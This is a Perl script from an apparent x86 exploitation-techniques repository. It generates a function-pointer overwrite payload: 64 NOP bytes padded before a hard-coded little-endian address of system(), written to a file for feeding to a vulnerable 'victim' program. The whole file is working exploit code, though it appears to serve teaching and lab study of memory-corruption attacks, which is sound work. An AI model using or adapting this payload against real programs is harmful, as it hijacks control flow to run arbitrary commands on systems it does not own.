advanced-exploitation-techniques-x86 / funcptr / funcptr_exploit.pl
funcptr_exploit.pl
Raw 
#!/usr/bin/perl

# This address must match the address of system 
my $sysaddr = "\x40\x83\x04\x08";  #8048340

# Fill NOP instruction
my $pad = "\x90" x 64;

# Input string to our victim's program
my $arg = $pad.$sysaddr;

# Let us store the input string to a file
open OUT, "> payload_funcptr";
print OUT $arg;
close OUT;
Powered by GitFront